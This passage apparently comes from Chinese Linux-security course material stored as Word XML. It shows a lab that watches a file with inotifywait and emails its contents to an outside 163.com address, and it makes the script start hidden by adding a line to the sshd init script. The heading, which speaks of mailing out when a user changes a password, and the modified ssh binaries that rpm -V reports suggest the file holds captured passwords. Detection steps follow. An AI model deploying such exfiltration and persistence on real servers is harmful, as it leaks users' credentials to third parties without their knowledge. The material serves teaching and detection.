            <wp:effectExtent l="0" t="0" r="10795" b="1206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5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设置授权密码，此密码用于第三方邮件客户端使用，既在linux主机实验中发送邮件也是使用该密码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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="2830195"/>
            <wp:effectExtent l="0" t="0" r="9525" b="8255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0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设置第三方邮件客户端密码完成后，随后出现设置授权提示，点击确定即可完成设置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3、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测试：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[root@xuegod63 ~]# mail -s "demo title"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helloworld14@163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.com &lt;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/usr/share/ifile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查看：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</w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="2390775"/>
            <wp:effectExtent l="0" t="0" r="7620" b="9525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4、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编写shell脚本自动发邮件，邮件的主题是服务器的IP地址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bin]# vim  /bin/zipmail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#写入以下内容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#!/bin/bash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ip=`ifconfig |grep inet| sed -n '1p'|awk '{print $2}'|awk -F ':' '{print $2}'`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mail -s $ip helloworld14@163.com &lt; /usr/share/ifil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>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bin]# chmod +x /bin/zipmail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5、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测试：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bin]# zipmail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发现也可以收到邮件，说明成功。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 xml:space="preserve">24.4.6 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实现当用户修改密码后，自动发邮件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1、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上传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inotify-tools-3.13.tar.gz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到服务器上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2、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安装：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[root@xuegod63 ~]# tar -zxvf inotify-tools-3.13.tar.gz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[root@xuegod63 ~]# cd inotify-tools-3.13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[root@xuegod63 inotify-tools-3.13]# ./configure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  检查安装环境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[root@xuegod63 inotify-tools-3.13]# make -j 4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  #make编译，将源代码编译成二进制，可执行的文件   # -j  4 使用4个CPU一起编译。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 xml:space="preserve">[root@xuegod63 inotify-tools-3.13]# make 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install  # 安装</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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tabs>
          <w:tab w:val="left" w:pos="67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FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3、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编写触发式自动发邮件脚本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[root@xuegod63 ~]# cat /bin/zipmail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#!/bin/bash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/usr/local/bin/inotifywait -mrq -e create,move,delete,modify /usr/share/ifile |while read a b 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do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ip=`ifconfig |grep inet| sed -n '1p'|awk '{print $2}'|awk -F ':' '{print $2}'`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mail -s $ip helloworld14@163.com &lt; /usr/share/ifile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done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>4、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设置开机启动zipmail脚本：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vim /etc/init.d/sshd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#在此文件的最后“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exit $RETVAL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” 前插入：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/bin/zipmail &amp;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exit $RETVAL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效果如图：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</w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3248025" cy="1257300"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0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5、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测试：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service sshd restart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Stopping sshd:                                             [  OK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Starting sshd:                                             [  OK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6、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排查：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方法1：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ps -axu | grep inoti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 #查看进程是否运行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Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.8/FAQ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FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20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root     25112  0.0  0.0   6284   524 pts/1    S    17:40   0:00 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/usr/local/bin/inotifywait -mrq -e create,move,delete,modify /tmp/ilog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root     25176  0.0  0.0   6284   528 pts/2    S    17:43   0:00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方法2：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rpm -Vf /usr/bin/ssh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S.5....T.    /usr/bin/scp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S.5....T.    /usr/bin/sftp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S.5....T.    /usr/bin/ssh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S.5....T.    /usr/bin/ssh-add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SM5...GT.    /usr/bin/ssh-agent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S.5....T.    /usr/bin/ssh-keyscan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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4646" o:spid="_x0000_s4097" o:spt="136" type="#_x0000_t136" style="position:absolute;left:0pt;height:95.75pt;width:491.5pt;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical:center;mso-position-vertical-relative:margin;rotation:-2949120f;z-index:-251658240;mso-width-relative:page;mso-height-relative:page;" fillcolor="#ED7D31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学神IT xuegod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2E2F4B"/>
    <w:rsid w:val="0678566F"/>
    <w:rsid w:val="4DAA2735"/>
    <w:rsid w:val="5A0848A8"/>
    <w:rsid w:val="5AD46DD3"/>
    <w:rsid w:val="622E2F4B"/>
    <w:rsid w:val="756F38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2018-03-14T14:04:00Z</dcterms:created>
  <dc:creator>minzong</dc:creator>
  <cp:lastModifiedBy>minzong</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-03-16T13:16:13Z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